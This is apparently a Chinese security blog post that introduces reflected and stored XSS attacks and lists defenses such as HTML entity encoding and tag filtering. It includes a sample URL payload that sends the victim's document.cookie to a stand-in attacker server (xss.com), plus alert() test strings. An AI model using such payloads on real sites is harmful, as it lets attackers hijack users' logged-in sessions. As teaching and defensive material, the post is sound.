专栏首页黑白安全xss的攻击方式

xss的攻击方式

1.xss攻击方式

反射型

发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传

回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射性XSS。

例如:网站搜索列表输入'<script>alert('xss')</script>',如果前端没有对数据进行过滤,浏览器alert那个字符串出来。

http://www.xxx.com/search?keyword=<script>document.location='http://xss.com/get?cookie='+document.cookie</script>

如果用户刚好已经登录该网站,那么,用户的登录cookie信息就已经发到了攻击者的服务器(xss.com)了。

存储型

存储型XSS和反射型XSS的差别仅在于,提交代码会存储在服务器端(数据库,内存,文件系统等),

下次请求目标页面时不用再提交XSS代码。

例如:用户评论输入'<script>alert('xss')</script>',如果前端没有对数据进行过滤,别的用户在浏览的时候恶意代码就会执行。

2.防御措施

编码 对用户输入的数据进行HTML Entity编码

过滤 移除用户上传的DOM属性,如onerror等

         移除用户上传的Style节点、Script节点、Iframe节点等

校正 避免直接对HTML Entity解码

          使用DOM Parse转换,校正不配对的DOM标签

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 快速入门xss 判断网站是否存在xss漏洞

    XSS全称跨站脚本攻击,用户浏览网页时,嵌入的Script代码被执行,从而达到攻击用户的目的,常见漏洞页面,网站搜索页面,留言板。

    周俊辉
  • 反射的跨站点脚本(XSS)攻击

    跨站点脚本攻击(XSS)是一种Web应用程序漏洞,允许攻击者将代码(通常为HTML或JavaScript)注入到外部网站的内容中。当受害者查看网站上的受感染页面...

    周俊辉
  • burpsuite检测xss漏洞 burpsuite实战指南

    XSS(跨站脚本攻击)漏洞是Web应用程序中最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的ht...

    周俊辉
  • 不可忽视的前端安全问题——XSS攻击

    用户1687375
  • 看图说话:持久式XSS(跨站)漏洞示例

    读书与实践是获取知识的主要渠道,学习的权力只掌握在每个人自己手中,让学习成为一种生活的习惯,这比任何名牌大学的校徽重要得多!

    张树臣
  • 【安全系列】XSS攻击与防御

    XSS攻击全称跨站脚本攻击(Cross Site Scripting),是为了不和层叠样式表(Cascading Style Sheets, CSS)的...

    深海鱼
  • xss备忘录

    黑白天安全
  • XSS分析及预防

    XSS(Cross Site Scripting),又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行。在WEB前端应用日益发展的今天,XSS漏洞尤其容...

    欲休
  • XSS注入

    XSS(Cross Site Scripting),由于与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此一般缩写为XSS。X...

    小老鼠
  • 跨站的艺术-XSS入门与介绍

    什么是XSS? XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写...

    云鼎实验室

扫码关注云+社区

领取腾讯云代金券